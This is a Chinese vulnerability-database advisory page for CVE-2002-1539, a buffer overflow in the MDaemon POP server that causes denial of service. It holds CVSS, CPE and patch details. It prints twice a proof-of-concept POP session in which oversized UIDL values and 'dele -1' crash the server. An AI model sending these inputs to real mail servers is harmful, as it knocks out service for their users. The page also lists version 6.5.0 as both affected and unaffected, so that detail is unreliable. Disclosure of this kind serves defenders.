CVE-2002-1539
CVSS5.0
发布时间 :2003-03-31 00:00:00
修订时间 :2008-09-05 16:30:52
NMCOES    

[原文]Buffer overflow in MDaemon POP server 6.0.7 and earlier allows remote authenticated users to cause a denial of service via long (1) DELE or (2) UIDL arguments.


[CNNVD]Alt-N MDaemon POP服务程序远程缓冲区溢出漏洞(CNNVD-200303-089)

        
        MDaemon是一款集成SMTP、POP3、和IMAP4,支持LDAP,集成基于浏览器EMAIL客户端,可以进行内容过滤,恶意邮件阻挡等功能的邮件服务系统。
        MDaemon包含的POP服务程序对用户提交的DELE或者UIDL命令缺少正确检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以POP服务进程的权限在系统上执行任意指令。
        攻击者可以向MDaemon POP服务程序提交包含超长字符串做参数的DELE或UIDL命令,可导致POP服务程序崩溃,精心提交参数数据可以以POP服务进程的权限在系统上执行任意指令。不过此漏洞需要攻击者有合法用户帐户才能进行利用。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:alt-n:mdaemon:6.0.5
cpe:/a:alt-n:mdaemon:6.0
cpe:/a:alt-n:mdaemon:6.0.7
cpe:/a:alt-n:mdaemon:6.0.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1539
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1539
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-089
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/6053
(VENDOR_ADVISORY)  BID  6053
http://www.iss.net/security_center/static/10488.php
(VENDOR_ADVISORY)  XF  mdaemon-dele-uidl-dos(10488)
http://archives.neohapsis.com/archives/bugtraq/2002-10/0382.html
(VENDOR_ADVISORY)  BUGTRAQ  20021027 MDaemon SMTP/POP/IMAP server DoS

- 漏洞信息

Alt-N MDaemon POP服务程序远程缓冲区溢出漏洞
中危 边界条件错误
2003-03-31 00:00:00 2005-10-20 00:00:00
远程  
        
        MDaemon是一款集成SMTP、POP3、和IMAP4,支持LDAP,集成基于浏览器EMAIL客户端,可以进行内容过滤,恶意邮件阻挡等功能的邮件服务系统。
        MDaemon包含的POP服务程序对用户提交的DELE或者UIDL命令缺少正确检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以POP服务进程的权限在系统上执行任意指令。
        攻击者可以向MDaemon POP服务程序提交包含超长字符串做参数的DELE或UIDL命令,可导致POP服务程序崩溃,精心提交参数数据可以以POP服务进程的权限在系统上执行任意指令。不过此漏洞需要攻击者有合法用户帐户才能进行利用。
        

- 公告与补丁

        厂商补丁:
        Alt-N
        -----
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Alt-N Upgrade MDaemon 6.5.0
        
        http://www.altn.com/Products/Default.asp?product_id=MDaemon

- 漏洞信息 (21965)

Alt-N MDaemon 6.0.x POP Server Buffer Overflow Vulnerability (EDBID:21965)
windows dos
2002-10-28 Verified
0 D4rkGr3y
N/A [点击下载]
source: http://www.securityfocus.com/bid/6053/info

A buffer overflow vulnerability has been reported for MDaemon. The vulnerability is due to inadequate bounds checking on some POP server commands.

An attacker can exploit this vulnerability by submitting a very large integer value to some commands on the POP server. This will cause the MDaemon service to crash when attempting to process the command. 

+OK somedomain.com POP MDaemon 6.0.5 ready
<MDAEMON-F200210290951.AA5138234MD2795@somedomain.com>
USER blah
+OK blah... Recipient ok
PASS 123456
+OK blah@somedomain.com's mailbox has 0 total messages (0 octets).
UIDL 2147483647
-ERR no such message
UIDL 2147483648
+OK -2147483648 !!! Index 0 is not used
UIDL 2147483649

Connection to host lost.

---

user dark
+OK dark... Recipient ok
pass ******
+OK dark@dark's mailbox has 13 total messages (2274775 octets).
dele -1

Connection to host lost. 		

- 漏洞信息

12047
MDaemon POP Server Multiple Command Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2002-10-27 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 6.5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Alt-N MDaemon POP Server Buffer Overflow Vulnerability
Boundary Condition Error 6053
Yes No
2002-10-28 12:00:00 2009-07-11 06:06:00
Discovery of this vulnerability credited to D4rkGr3y <grey_1999@mail.ru>.

- 受影响的程序版本

Alt-N MDaemon 6.0.7
Alt-N MDaemon 6.0.6
Alt-N MDaemon 6.0.5
Alt-N MDaemon 6.0 .0
Alt-N MDaemon 6.5 .0
Alt-N MDaemon 5.0.7
Alt-N MDaemon 3.1.2

- 不受影响的程序版本

Alt-N MDaemon 6.5 .0
Alt-N MDaemon 5.0.7
Alt-N MDaemon 3.1.2

- 漏洞讨论

A buffer overflow vulnerability has been reported for MDaemon. The vulnerability is due to inadequate bounds checking on some POP server commands.

An attacker can exploit this vulnerability by submitting a very large integer value to some commands on the POP server. This will cause the MDaemon service to crash when attempting to process the command.

- 漏洞利用

The following proof of concepts was provided:

+OK somedomain.com POP MDaemon 6.0.5 ready
&lt;MDAEMON-F200210290951.AA5138234MD2795@somedomain.com&gt;
USER blah
+OK blah... Recipient ok
PASS 123456
+OK blah@somedomain.com's mailbox has 0 total messages (0 octets).
UIDL 2147483647
-ERR no such message
UIDL 2147483648
+OK -2147483648 !!! Index 0 is not used
UIDL 2147483649

Connection to host lost.

---

user dark
+OK dark... Recipient ok
pass ******
+OK dark@dark's mailbox has 13 total messages (2274775 octets).
dele -1

Connection to host lost.

- 解决方案

Alt-N MDaemon 6.5.0 is not vulnerable to this issue.

Fixes available:


Alt-N MDaemon 6.0 .0

Alt-N MDaemon 6.0.5

Alt-N MDaemon 6.0.6

Alt-N MDaemon 6.0.7

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站